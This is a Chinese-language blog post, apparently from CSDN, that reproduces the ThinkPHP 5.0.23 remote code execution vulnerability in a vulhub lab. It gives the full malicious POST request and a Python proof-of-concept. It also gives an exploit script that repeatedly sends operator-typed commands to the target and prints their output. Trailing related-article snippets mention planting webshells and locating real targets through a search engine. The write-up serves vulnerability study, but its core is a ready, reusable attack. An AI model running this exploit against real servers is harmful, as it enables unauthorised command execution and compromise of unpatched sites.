ThinkPHP5 5.0.23 远程代码执行漏洞复现,python编写POC和EXP

最新推荐文章于 2024-09-08 21:34:39 发布
最新推荐文章于 2024-09-08 21:34:39 发布
阅读量1.4k 收藏 6
点赞数
分类专栏: 漏洞复现 文章标签: python 安全漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqiao258/article/details/120616943
版权

环境搭建:

使用vulhub,进入对应文件夹启动环境:


[root@localhost ~]# cd /home/vulhub/thinkphp/5.0.23-rce/
[root@localhost 5.0.23-rce]# docker-compose up -d

查看端口:


[root@localhost 5.0.23-rce]# docker ps
CONTAINER ID   IMAGE                    COMMAND                  CREATED         STATUS         PORTS                                   NAMES
e43f3b0238fe   vulhub/thinkphp:5.0.23   "docker-php-entrypoi…"   8 seconds ago   Up 7 seconds   0.0.0.0:8080->80/tcp, :::8080->80/tcp   5023-rce_web_1
[root@localhost 5.0.23-rce]#

漏洞复现:

发送如下数据包:


POST /index.php?s=captcha HTTP/1.1
Host: 192.168.10.10
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

在这里插入图片描述

POC编写:

import requests


url = "http://192.168.10.10:8080/"

bug = "index.php?s=captcha"
bug_data = {"_method": "__construct", "filter[]": "system", "method": "get", "server[REQUEST_METHOD]": "echo wwwq|md5sum"}
res = requests.post(url + bug,  data=bug_data)
if "c0f07f528bbb4eed25c97370610a7c8e" in res.text: #  wwwq  的 md5  值
    print("ThinkPHP5 5.0.23 远程代码执行漏洞存在")

pycharm运行结果:
在这里插入图片描述

EXP编写:

import requests,re


url = "http://192.168.10.10:8080/"

bug = "index.php?s=captcha"
bug_data = {"_method": "__construct", "filter[]": "system", "method": "get", "server[REQUEST_METHOD]": "echo wwwq|md5sum"}
res = requests.post(url + bug,  data=bug_data)
if "c0f07f528bbb4eed25c97370610a7c8e" in res.text: #  wwwq  的 md5  值
    print("ThinkPHP5 5.0.23 远程代码执行漏洞存在")

    while 1:
        bug_data["server[REQUEST_METHOD]"] = input("请输入你要执行的命令:")  # 替换输入的命令
        exp_res = requests.post(url + bug, data=bug_data)
        num = exp_res.text.index("<!DOCTYPE html>")  # 获取这个头的下标
        print(exp_res.text[0:num])  # 打印从 0 到这个 num 下标间的内容

pycharm运行结果:
在这里插入图片描述

~王
关注
专栏目录
ThinkPHP5远程代码执行exp利用工具safe6
safe6
12-12 7080
影响范围:ThinkPHP 5.0 - 5.1版本。 危害:远程代码执行 目前,ThinkPHP已发布新版本修复此漏洞,请广大ThinkPHP站长尽快升级: https://blog.thinkphp.cn/869075   2018.12.11 说明: 漏洞检测,5.0和5.1都可以检测。 命令执行,文件上传只支持5.0版本tp。5.1和5.0利用大同小异,不打算写。这只是个练手...
记录一次vulhub:ThinkPHP5 5.0.23远程代码执行漏洞复现
sszsNo1的博客
06-26 342
复现vulhub:ThinkPHP5 5.0.23远程代码执行漏洞
thinkphp远程代码执行exp
07-29
thinkphp远程代码执行漏洞exp,版本通用,带检查,上传等功能。
ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
最新发布
Nai_zui_jiang的博客
09-08 365
判断是否存在漏洞:访问/index.php?s=captcha页面,会出现报错。通过echo命令写入 Webshell 文件并把木马进行base64编码。使用HackBar 插件发送 POST 请求。访问shell.php,使用蚁剑连接。启动环境,先关闭其他环境。
ThinkPHP5.0.23 远程代码执行漏洞
小小猪的博客
11-20 1480
ThinkPHP5.0.23 远程代码执行漏洞 漏洞描述: ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞影响: ThinkPHP <= 5.0.24 环境复现: 靶场地址【安鸾渗透实战平台】地址 漏洞复现: 在kali中查询Thinkphp5.X相关漏洞,发现存在。 查看该漏洞文件。 发现.
ThinkPHP5.0.23源码分析系列(一):入口文件
weixin_34409741的博客
12-17 313
2019独角兽企业重金招聘Python工程师标准>>> ...
think php 远程代码执行,thinkphp5远程代码执行复现
weixin_33980357的博客
04-13 125
0x01前言12 月 10 日,ThinkPHP 官方发布了安全更新,其中修复了 ThinkPHP5 框架的一个高危漏洞:https://blog.thinkphp.cn/8690750x02 漏洞复现:zoomeye搜索关键字“你值得信赖的PHP框架” ,搜到424个thinkphp5的站:找个国外地址作为目标:exp:?s=index/\think\Request/input&filt...
ThinkPHP5 5.0.23 远程代码执行漏洞复现-分析
zeroc009的博客
02-15 1875
漏洞简述 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 关键代码 @@ -522,8 +522,11 @@ public function method($method = false) return $this->server('REQUEST_METHOD') ?: 'GET'; } elseif (!
复现ThinkPHP5 5.0.23远程代码执行漏洞
weixin_67813445的博客
03-14 462
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP5 5.0.23 远程代码执行漏洞
weixin_51387754的博客
01-01 888
ThinkPHP5 5.0.23 远程代码执行漏洞 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞复现 执行如下命令启动一个默认的thinkphp 5.0.23环境: docker-compose up -d 环境启动后,访问http://your-ip:8080即可看到默认的ThinkPHP启动页面。 POST /index.php?s=ca
thinkphp5.0.23漏洞复现以及脚本编写
weixin_45653478的博客
04-26 1050
ThinkPHP5.0.23漏洞主要涉及远程代码执行(RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
python3编写ThinkPHP命令执行Getshell的方法
09-19
主要介绍了python3编写ThinkPHP命令执行Getshell的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
ThinkPHP V5.0.5漏洞_ThinkPhp5.0.x远程RCE复现
weixin_39975486的博客
11-19 1459
0x1 前言之前看到大佬们在网上爆出tp远程代码执行,我就想着来复现一波,所以写篇文章做个笔记。0x2漏洞复现首先去ThinkPhP官网下载他的一个框架:框架下载 - ThinkPHP框架​www.thinkphp.cn在这里我选择的是ThinkPHP5.0.22完整版,大家可以下载其他版本!然后使用phpstudy集成环境搭建Tp5.0.22:然后运行php环境,在这里我选择的是Apach+PH...
thinkphp5使用模型删除与复杂查询EXP
ChinaLibrary的博客
06-17 505
软删除EXP
thinkphp5.X漏洞利用EXP
Websec
05-17 2265
thinkphp5最出名的就是rce,rce有两个大版本的分别 ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直接访问路由触发的 5.1.x : ?s=index/thinkRequest/input&filter[]=system&data=pwd ?s=index/thinkviewdriverPhp/display&conte
Thinkphp5.0.23 rce
Continuejww的博客
02-23 878
ThinkPHP是中国使用极其广泛的PHP开发框架。在其 5.0
thinkphp5.0.23 远程代码执行复现
qq_38807738的博客
02-08 7141
漏洞影响版本5.0.23之前的版本 我使用的是vulhub下提供的漏洞环境,如何使用自行百度谷歌。 装好后打开网站如下   使用如下poc,即可实现远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: 你的id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Ge...
ThinkPHP 5.0 远程代码执行漏洞详解
"ThinkPHP 5.0 远程代码执行漏洞分析" 在网络安全领域,远程代码执行漏洞是一种极其危险的漏洞,允许攻击者在受害者的服务器上执行任意代码。这篇关于ThinkPHP 5.0 远程代码执行的分析报告,专注于探讨了如何利用这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值